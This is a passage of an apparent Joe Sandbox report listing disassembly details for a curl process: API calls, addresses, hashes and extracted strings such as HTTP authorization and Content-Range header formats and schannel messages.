                                  • Part of subcall function 0087A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A0CB
                                  • Part of subcall function 0087A0B8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A0DD
                                  • Part of subcall function 0087A0B8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 0087A0EC
                                  • Part of subcall function 0087A0B8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 0087A0F6
                                  • Part of subcall function 0087A0B8: _strrchr.LIBCMT ref: 0087A142
                                  • Part of subcall function 0087A0B8: _strrchr.LIBCMT ref: 0087A15C
                                  • Part of subcall function 0087A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A173
                                  • Part of subcall function 0087A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A180
                                  • Part of subcall function 0087A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0087A188
                                  • Part of subcall function 0087A0B8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0087A193
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087E535
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087E53D
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _errno$ErrorLast$_strrchr$__sys_errlist__sys_nerrgetpeernamestrncpy
                                • String ID: 0Lu@Ru@/Mu$getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
                                • API String ID: 1744225859-235361406
                                • Opcode ID: 9a4617d3b9779246ff013df5e282b3fa8dcc66bd6c7601728389b636397066fe
                                • Instruction ID: 6d83af7467debbe0bd3366e94d9d228f0f79fdd34cff5e8b1797397ef916c61f
                                • Opcode Fuzzy Hash: 9a4617d3b9779246ff013df5e282b3fa8dcc66bd6c7601728389b636397066fe
                                • Instruction Fuzzy Hash: 9E218E72900518AFDB14AB64DC55FEE77BCFB49314F0086AAF909D3241EA709E488FE1
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00890B5D,?,?,00000001), ref: 008A0E63
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,?,00890B5D,?,?,00000001), ref: 008A0ECE
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?,00890B5D,?,?,00000001), ref: 008A0F09
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,?,?,?,00890B5D,?,?,00000001), ref: 008A0F86
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?,?,00890B5D,?,?,00000001), ref: 008A0FC1
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID: %sAuthorization: NTLM %s$HTTP$Proxy-
                                • API String ID: 1294909896-3667642693
                                • Opcode ID: c95bf1cc62aae3a1a9815de7c490823b04e2596113d09d724c1ccd8ef7ed56a7
                                • Instruction ID: f2af9659b76d0e85edd3dbd60238c2a838a7169848d2e35de23b087981e30a1a
                                • Opcode Fuzzy Hash: c95bf1cc62aae3a1a9815de7c490823b04e2596113d09d724c1ccd8ef7ed56a7
                                • Instruction Fuzzy Hash: FD914775A0420AAFEB14CFA8D880AADBBF5FF49314F14406AE905E7351EB71AD41CF91
                                APIs
                                  • Part of subcall function 008A67EE: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00890591,00000001,00000000,00000000,00000000,?,?,?), ref: 008A6847
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,00890D79,?), ref: 008A2E88
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,00890D79,?), ref: 008A2EAD
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,00890D79,?), ref: 008A2ECD
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A2F34
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$malloc
                                • String ID: %sAuthorization: Negotiate %s$Curl_output_negotiate, no persistent authentication: cleanup existing context$Negotiate$Proxy-
                                • API String ID: 2190258309-1255959952
                                • Opcode ID: 2f6991fa93d814731040f69b0294c3041af52116f51cb6115b74f0b2520613d0
                                • Instruction ID: a11b3faf8ac9815652c50ec04495952a2f1e50d0fdf1eb0bb2f501de8a675240
                                • Opcode Fuzzy Hash: 2f6991fa93d814731040f69b0294c3041af52116f51cb6115b74f0b2520613d0
                                • Instruction Fuzzy Hash: B871E131B48206DFEB298B18C850BA97BF5FF46344F1940ADD841DB292EB78DD44CB51
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,00861773), ref: 008618D7
                                • ___from_strstr_to_strchr.LIBCMT ref: 0086190C
                                • _strrchr.LIBCMT ref: 0086191C
                                • _strrchr.LIBCMT ref: 00861931
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,00861773), ref: 00861944
                                • ___from_strstr_to_strchr.LIBCMT ref: 00861955
                                • ___from_strstr_to_strchr.LIBCMT ref: 00861965
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,?,00861773), ref: 008619A0
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ___from_strstr_to_strchr$_strrchrfree$malloc
                                • String ID:
                                • API String ID: 3226260525-0
                                • Opcode ID: 906af168b49ff2d5b95bfa6a9c6ac7c0e30b8af6da1c2f1c30d7ebad43ce1451
                                • Instruction ID: b308092a8ad9a529c7a7c8724b195b96db57a57f0392fa15148895dbdee598b7
                                • Opcode Fuzzy Hash: 906af168b49ff2d5b95bfa6a9c6ac7c0e30b8af6da1c2f1c30d7ebad43ce1451
                                • Instruction Fuzzy Hash: D3318B371096126EDF155A3CAC6A9FA7F9CFF4336079E4069E481DB283DF119D0282B5
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00892BB8
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00892C0A
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID: Content-Range$Content-Range: bytes %s%I64d/%I64d$Content-Range: bytes %s/%I64d$Content-Range: bytes 0-%I64d/%I64d$Range$Range: bytes=%s
                                • API String ID: 1294909896-2902172602
                                • Opcode ID: 9c8c58040d205241c78f0e042ccf01cc7ca75f6f6944db5fb05d33c24a91617e
                                • Instruction ID: 911386c04f5cf9556f8848ba72ae779329eab4f617dcc46cd8c87a5f9b228201
                                • Opcode Fuzzy Hash: 9c8c58040d205241c78f0e042ccf01cc7ca75f6f6944db5fb05d33c24a91617e
                                • Instruction Fuzzy Hash: 7531DB72B04911BAEB1C3B789C41F6AB795FB45724F18832AE519D2251DB31AC508AA1
                                APIs
                                  • Part of subcall function 0089480B: QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,008724A8), ref: 00894820
                                  • Part of subcall function 0089480B: __alldvrm.LIBCMT ref: 00894839
                                  • Part of subcall function 0089480B: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00894863
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,00000000), ref: 0089510A
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00000000), ref: 00895118
                                • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(00000001), ref: 00895159
                                • MoveFileExA.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING),00000000,?,00000000), ref: 00895166
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00895175
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00895181
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008951A1
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 008951AD
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$_strdup$CounterFileMovePerformanceQuerySleepUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
                                • String ID:
                                • API String ID: 1781201201-0
                                • Opcode ID: 95618429ff819e65fc0d9b728bc34398158925b953af42de6cfb4627c3625d95
                                • Instruction ID: e8ee44bb75de1281dba381abc43bfd72ff7924f19db106db7eb22dbdab7be5fb
                                • Opcode Fuzzy Hash: 95618429ff819e65fc0d9b728bc34398158925b953af42de6cfb4627c3625d95
                                • Instruction Fuzzy Hash: ED219272901A05AFDF16FFB8AC85ADF77A9FF09710B180525FD01FB242DBB199014A91
                                APIs
                                  • Part of subcall function 0089FEA6: getaddrinfo.WS2_32(?,?,?,?), ref: 0089FEC0
                                  • Part of subcall function 0089FEA6: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 0089FF44
                                • WSAGetLastError.WS2_32 ref: 00888A68
                                • WSAGetLastError.WS2_32 ref: 00888A72
                                • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?), ref: 00888A87
                                • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?), ref: 00888A95
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00888AB1
                                • send.WS2_32(000000FF,?,00000001,00000000), ref: 00888ACC
                                • WSAGetLastError.WS2_32 ref: 00888AD6
                                • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?), ref: 00888AE4
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: CriticalErrorLastSection$Leave$Enterfreegetaddrinfomallocsend
                                • String ID:
                                • API String ID: 2368937457-0
                                • Opcode ID: 323eafc7be06ec1d572c10ba07265a5dbd67f60a31f96b60e02313e58e7b3d17
                                • Instruction ID: 7e91733a2d3090aedcaf4eb270995beab59ed53f56cafe2afedadab305d40600
                                • Opcode Fuzzy Hash: 323eafc7be06ec1d572c10ba07265a5dbd67f60a31f96b60e02313e58e7b3d17
                                • Instruction Fuzzy Hash: 6021AD75200B04DFC720AF65DC54A6FBBB9FF44700B404A2EE992D32A1DB30A809CBA0
                                APIs
                                • _set_app_type.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000001), ref: 008B1113
                                • _set_fmode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001), ref: 008B111E
                                • __p__commode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001), ref: 008B112A
                                • __RTC_Initialize.LIBCMT ref: 008B1142
                                • _configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,008B18B0), ref: 008B1157
                                  • Part of subcall function 008B1813: InitializeSListHead.KERNEL32(008CF430,008B1167), ref: 008B1818
                                • __setusermatherr.API-MS-WIN-CRT-MATH-L1-1-0(Function_00027BE0), ref: 008B1175
                                • _configthreadlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(00000000), ref: 008B1190
                                • _initialize_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 008B119F
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: Initialize$HeadList__p__commode__setusermatherr_configthreadlocale_configure_narrow_argv_initialize_narrow_environment_set_app_type_set_fmode
                                • String ID:
                                • API String ID: 1933938900-0
                                • Opcode ID: 1ec1bd37e0844cf6bff569c87a264db2cce61362fb10bd7a8ca5529b68ad5804
                                • Instruction ID: 04daf73fac1da49225f52d85777bbe387233916985194cb6744abb248cce58de
                                • Opcode Fuzzy Hash: 1ec1bd37e0844cf6bff569c87a264db2cce61362fb10bd7a8ca5529b68ad5804
                                • Instruction Fuzzy Hash: 89018C12A14A1A14ED2033FD593FADF261AFF113A0BE88860F910EE393ED59D51140B3
                                APIs
                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,008B2241,008B20AB,008B1714), ref: 008B2258
                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008B2266
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008B227F
                                • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,008B2241,008B20AB,008B1714), ref: 008B22D1
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ErrorLastValue___vcrt_
                                • String ID:
                                • API String ID: 3852720340-0
                                • Opcode ID: c5bcd203475b3dc00205c47a48878b1f2503b2ea31a37c032657d488432604f3
                                • Instruction ID: 5c4fc4c1d5fb74ca22fb39e78bef1978cc3c6634030901022e64cf4926773080
                                • Opcode Fuzzy Hash: c5bcd203475b3dc00205c47a48878b1f2503b2ea31a37c032657d488432604f3
                                • Instruction Fuzzy Hash: 70014732508B125EB62427B8BC85BEB6BA4FB16B747300339F110C43F3EF614C415664
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A2223
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A223B
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A2253
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A226B
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A2283
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A229B
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A22B3
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A22CB
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A22E3
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 3cf68eae5e8fd4fc6511ab98bc25071b03f145ef3cf69de3271ca86b3fa390ac
                                • Instruction ID: 571c5f55a7175ba1dc5fe6dd2e1b88f6677aef2b1425423edf91ffbad48b2d88
                                • Opcode Fuzzy Hash: 3cf68eae5e8fd4fc6511ab98bc25071b03f145ef3cf69de3271ca86b3fa390ac
                                • Instruction Fuzzy Hash: 12518132504B11CFEF298F18D8487697BE1FF59325F2881AAD9058B356DBB5AC00CF95
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,754C3C50,00000000,0088182F), ref: 0087F671
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087F685
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087F699
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087F6AD
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087F6C1
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087F6D5
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087F6E9
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087F6FD
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087F70F
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: a273b1f8a4ede026e750d3bafd74629443bc56cc3c42676b25a3ff8d1688ba01
                                • Instruction ID: 40484a297fd343c1e92456d5143b7712388ea94544a211c60a4aa438bc2e46ac
                                • Opcode Fuzzy Hash: a273b1f8a4ede026e750d3bafd74629443bc56cc3c42676b25a3ff8d1688ba01
                                • Instruction Fuzzy Hash: 83119232614929DB9A092F24FC0885CBFF6FF4DA61329816AE50193772DFB52C118FD4
                                APIs
                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,I32,00000003,?,00000000,754B43D0,?,00871589,?,?,?,?,00000000), ref: 00871012
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: strncmp
                                • String ID: I32$I64
                                • API String ID: 1114863663-3980630743
                                • Opcode ID: d2c26ffaa7d9822a971be6c58aa7bc3de801a6a5a97365e8cadaa5c56fcd442f
                                • Instruction ID: 4fc8f87a66a0550f4fd0297eb4ad32abbb58085c745d3405e5445c31f167028a
                                • Opcode Fuzzy Hash: d2c26ffaa7d9822a971be6c58aa7bc3de801a6a5a97365e8cadaa5c56fcd442f
                                • Instruction Fuzzy Hash: 95F1C5B1A002059BDF2D8E6CC9AC77CBBA5FB45304F68C16ED54ADBF59D278CA409740
                                APIs
                                • GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll,wine_get_version), ref: 008A463C
                                • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 008A4643
                                Strings
                                • ntdll, xrefs: 008A4637
                                • wine_get_version, xrefs: 008A4632
                                • Failed to set SNI, xrefs: 008A47E5
                                • schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc., xrefs: 008A461C
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: Failed to set SNI$ntdll$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$wine_get_version
                                • API String ID: 1646373207-3067498429
                                • Opcode ID: 180852e3b3c9eb02c1e978dbac81e6688edfb367e96303fe3bedaca92ac0b42c
                                • Instruction ID: 9015cbd2f53e1bccb45eb1084510f93fc3e1968a07481e66e57e71a673e69f7b
                                • Opcode Fuzzy Hash: 180852e3b3c9eb02c1e978dbac81e6688edfb367e96303fe3bedaca92ac0b42c
                                • Instruction Fuzzy Hash: 4F617D306043448FFF298E288885BA573A5FF93325F1412A9E855DE6D2DBB48D85CB12
                                APIs
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008ACB20
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008ACB42
                                • realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008ACB9C
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AD01D
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AD033
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$callocmallocrealloc
                                • String ID:
                                • API String ID: 4199894680-3916222277
                                • Opcode ID: ded14d87a54dddb5fd9498f9ed2fcea3d33d4ef25c372e8b6a6d3733c965c847
                                • Instruction ID: 7b7e9c6aceeba2c5b631ac0add0dbee41e711dfc64da736201767ddf515fe61d
                                • Opcode Fuzzy Hash: ded14d87a54dddb5fd9498f9ed2fcea3d33d4ef25c372e8b6a6d3733c965c847
                                • Instruction Fuzzy Hash: C1518731A00B169FEB24CF29D548A25BBF1FB4A320F188529D416C7F51D732F890CB95
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,00000000,00000001,00000000,?,?,0086199D,00000000,?,?,00861773), ref: 00862C7A
                                • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,00000001,?,0086199D,00000000,?,?,00861773), ref: 00862C91
                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\\?\,00000004), ref: 00862CAE
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000004), ref: 00862D52
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862D79
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$mallocstrncmpstrncpy
                                • String ID: \\?\$|<>"?*
                                • API String ID: 2141947759-3264285191
                                • Opcode ID: 2f4dbfda4233d24d4d5a73f73392fb31eff422bf1144c83b98a207f473872ee6
                                • Instruction ID: 7c02ba6d7b33e08f9e1ff899f19841d95de62286d01542b8715d8a68c2e77d1f
                                • Opcode Fuzzy Hash: 2f4dbfda4233d24d4d5a73f73392fb31eff422bf1144c83b98a207f473872ee6
                                • Instruction Fuzzy Hash: 15513431A04F5E9FEB258B28C8547AE7BA5FF42354F2A41E9DC81DB292D7348D40C790
                                APIs
